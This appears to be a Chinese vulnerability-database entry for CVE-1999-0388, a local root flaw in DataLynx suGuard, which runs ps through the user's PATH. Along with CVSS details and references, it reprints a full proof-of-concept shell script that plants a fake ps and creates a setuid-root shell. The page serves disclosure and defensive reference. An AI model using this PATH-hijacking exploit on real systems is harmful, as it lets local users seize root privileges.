CVE-1999-0388
CVSS4.6
发布时间 :1999-01-01 00:00:00
修订时间 :2008-09-09 08:34:26
NMCOE    

[原文]DataLynx suGuard trusts the PATH environment variable to execute the ps command, allowing local users to execute commands as root.


[CNNVD]DataLynx suGuard执行如:根命令漏洞(CNNVD-199901-006)

        DataLynx suGuard信任PATH环境变量从而执行ps命令,本地用户利用该漏洞执行例如根命令。

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0388
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0388
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199901-006
(官方数据源) CNNVD

- 其它链接及资源

http://www.osvdb.org/3186
(UNKNOWN)  OSVDB  3186

- 漏洞信息

DataLynx suGuard执行如:根命令漏洞
中危 未知
1999-01-01 00:00:00 2005-05-02 00:00:00
本地  
        DataLynx suGuard信任PATH环境变量从而执行ps命令,本地用户利用该漏洞执行例如根命令。

- 公告与补丁

        

- 漏洞信息 (19146)

DataLynx suGuard 1.0 Vulnerability (EDBID:19146)
linux local
1999-01-03 Verified
0 Dr. Mudge
N/A [点击下载]
source: http://www.securityfocus.com/bid/186/info

A vulnerability exists within the DataLynx's suGuard program which allows a local attacker to gain administrative privilege by exploiting poor use of the /tmp directory and poor programming. 

#!/bin/sh
# sgrun exploit - the types of vulnerabilities that this exploit exercises
#  have no right being introduced to code in this day and age. Much less
#  code which presents itself under the pretenses of securing your system.
#   .mudge 01.02.99
#
SUSHI=./sushi

if [ $# -ne 2 ] ; then
  echo Must specify path to sgrun [/bin/datalynx/sgrun] and sgrun argument
  echo  mudge@l0pht.com [01.02.99]
  exit 1
fi
  
SGRUN=$1
ARG=$2

if [ -f ${SUSHI} ] ; then
  echo root shell already created?
  exit
fi

echo datalynx sgrun proof of concept exploit from L0pht [mudge@l0pht.com]
echo

cat > ./ps << FOEFOE
#!/bin/sh
cp /bin/ksh ${SUSHI}
chown root ${SUSHI}
chmod 4555 ${SUSHI}
FOEFOE

chmod 755 ./ps

PATH=.:${PATH}
export PATH

#/bin/datalynx/sgrun Identify 
${SGRUN} ${ARG}
if [ -f ${SUSHI} ] ; then
  echo root shell created as ${SUSHI}
  ls -l ${SUSHI}
  echo
fi  		

- 漏洞信息

3186
suGuard sgrun Execute Arbitrary Local Commands

- 漏洞描述

suGuard contains a flaw that allows any local user to gain root privileges. The flaw is due to suGuard's main application running the 'ps' program based on the user's PATH environment. When it calls the program it does so with root privileges, but does not verify the program it is running. A malicious local attacker can put a specially crafted 'ps' command in their path and have suGuard run it instead.

- 时间线

1999-01-03 Unknow
1999-01-03 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站